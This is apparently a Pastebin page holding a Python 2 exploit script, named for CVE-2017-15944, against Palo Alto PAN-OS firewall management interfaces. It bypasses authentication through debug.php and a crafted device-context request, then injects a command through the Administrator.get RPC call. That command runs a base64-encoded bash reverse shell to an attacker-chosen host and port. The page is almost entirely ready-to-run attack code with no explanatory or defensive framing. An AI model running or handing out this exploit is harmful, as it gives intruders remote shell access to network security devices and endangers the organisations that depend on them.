SHARE
TWEET

panos-poc-rce-v2.py

a guest Mar 13th, 2018 468 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # encoding: utf-8
  3. import requests
  4. import sys
  5. import base64
  6.  
  7. requests.packages.urllib3.disable_warnings()
  8. session = requests.Session()
  9.  
  10. def step3_exp(lhost, lport):
  11.     command = base64.b64encode('''exec("import os; os.system('bash -i >& /dev/tcp/{}/{} 0>&1')")'''.format(lhost, lport))
  12.     exp_post = r'''{"action":"PanDirect","method":"execute","data":["07c5807d0d927dcd0980f86024e5208b","Administrator.get",{"changeMyPassword":true,"template":"asd","id":"admin']\" async-mode='yes' refresh='yes'  cookie='../../../../../../../../../tmp/* -print -exec python -c exec(\"'''+ command + r'''\".decode(\"base64\")) ;'/>\u0000"}],"type":"rpc","tid": 713}'''
  13.     return exp_post
  14.  
  15. def exploit(target, port):
  16.     step1_url = 'https://{}:{}/php/utils/debug.php'.format(target, port)
  17.     step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target, port)
  18.     step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
  19.  
  20.     try:
  21.         if session.get(step1_url, verify=False).status_code == 200:
  22.             if session.get(step2_url, verify=False).status_code == 200:
  23.                 r = session.get(step1_url, verify=False)
  24.         if 'Debug Console' in r.text:
  25.             print '[+] bypass success'
  26.             lhost = raw_input('[*] LHOST: ')
  27.             if lhost:
  28.                 print '[+] set LHOST = {}'.format(lhost)
  29.                 lport = raw_input('[*] LPORT: ')
  30.             else:
  31.                 exit('[!] LHOST invalid')
  32.             if lport:
  33.                 print '[+] set LPORT = {}'.format(lport)
  34.             else:
  35.                 exit('[!] LPORT invalid')
  36.             exp_post = step3_exp(lhost, lport)
  37.             rce = session.post(step3_url, data=exp_post).json()
  38.             if rce['result']['@status'] == 'success':
  39.                 print '[+] success, please wait ... '
  40.                 print '[+] jobID: {}'.format(rce['result']['result']['job'])
  41.             else:
  42.                 exit('[!] fail')
  43.         else:
  44.             exit('[!] bypass fail')
  45.     except Exception, err:
  46.         print err
  47.  
  48.  
  49. if __name__ == '__main__':
  50.     if len(sys.argv) <= 3:
  51.         exploit(sys.argv[1], sys.argv[2])
  52.     else:
  53.         exit('[+] usage: python CVE_2017_15944_EXP.py IP PORT')
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top